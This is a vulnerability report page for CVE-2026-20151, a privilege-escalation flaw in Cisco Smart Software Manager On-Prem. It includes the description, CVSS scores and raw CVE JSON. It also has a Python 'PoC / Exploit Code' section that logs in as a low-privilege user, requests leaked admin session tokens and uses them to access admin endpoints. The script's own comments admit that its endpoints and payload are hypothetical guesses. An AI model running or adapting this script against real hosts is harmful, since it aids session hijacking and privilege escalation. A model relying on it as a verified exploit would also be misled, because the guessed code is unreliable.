Security Vulnerability Report
中文
CVE-2026-20151 CVSS 7.3 HIGH

CVE-2026-20151

Published: 2026-04-01 17:28:31
Last Modified: 2026-04-03 16:11:11
Source: [email protected]

Description

A vulnerability in the web interface of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an authenticated, remote attacker to elevate privileges on an affected system. This vulnerability is due to the improper transmission of sensitive user information. An attacker could exploit this vulnerability by sending a crafted message to an affected Cisco SSM On-Prem host and retrieving session credentials from subsequent status messages. A successful exploit could allow the attacker to elevate privileges on the affected system from low to administrative. To exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of System User. Note: This vulnerability exposes information only about users who logged in to the Cisco SSM On-Prem host using the web interface and who are currently logged in. SSH sessions are not affected.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Cisco Smart Software Manager On-Prem (具体受影响版本请参考官方安全通告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # Target configuration (Replace with actual target details) TARGET_URL = "https://<target-ssm-host>" LOGIN_USER = "low_priv_user" LOGIN_PASS = "password" def exploit_cve_2026_20151(): session = requests.Session() session.verify = False # Ignore SSL verification for testing print(f"[*] Attempting to login as {LOGIN_USER}...") # Step 1: Authenticate as a low-privileged user login_data = { "username": LOGIN_USER, "password": LOGIN_PASS } try: login_resp = session.post(f"{TARGET_URL}/api/login", data=login_data) if login_resp.status_code != 200: print("[-] Login failed.") return print("[+] Login successful.") except Exception as e: print(f"[-] Error during login: {e}") return # Step 2: Send crafted message to trigger sensitive info leak # Based on the vulnerability description, we send a crafted message to retrieve session creds print("[*] Sending crafted message to retrieve session credentials...") # Hypothetical payload structure based on "improper transmission of sensitive user information" crafted_payload = { "action": "get_session_status", "verbose": True, "target_id": "active_admin_sessions" } try: # Hypothetical endpoint that handles status messages exploit_resp = session.post(f"{TARGET_URL}/api/v1/status/message", json=crafted_payload) if exploit_resp.status_code == 200: response_data = exploit_resp.json() print("[+] Received response from server.") # Step 3: Parse the response for leaked admin credentials # The vulnerability states that session credentials are retrievable from status messages if "leaked_session_token" in response_data: admin_token = response_data["leaked_session_token"] print(f"[!] Successfully leaked Admin Token: {admin_token}") # Step 4: Verify privilege escalation print("[*] Attempting to access admin resources with leaked token...") session.cookies.set("session_id", admin_token) admin_check = session.get(f"{TARGET_URL}/api/admin/config") if admin_check.status_code == 200: print("[!] Privilege Escalation Successful! Admin access confirmed.") else: print("[-] Token did not grant admin access.") else: print("[-] Response did not contain expected leaked credentials. Vulnerability might not be triggered or patched.") print(f"Debug Response: {json.dumps(response_data, indent=2)}") else: print(f"[-] Exploit request failed with status code: {exploit_resp.status_code}") except Exception as e: print(f"[-] Error during exploitation: {e}") if __name__ == "__main__": exploit_cve_2026_20151()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20151", "sourceIdentifier": "[email protected]", "published": "2026-04-01T17:28:31.097", "lastModified": "2026-04-03T16:11:11.357", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the web interface of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an authenticated, remote attacker to elevate privileges on an affected system.\r\n\r\nThis vulnerability is due to the improper transmission of sensitive user information. An attacker could exploit this vulnerability by sending a crafted message to an affected Cisco SSM On-Prem host and retrieving session credentials from subsequent status messages. A successful exploit could allow the attacker to elevate privileges on the affected system from low to administrative.\r\nTo exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of System User.\r\nNote: This vulnerability exposes information only about users who logged in to the Cisco SSM On-Prem host using the web interface and who are currently logged in. SSH sessions are not affected."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-priv-esc-xRAnOuO8", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.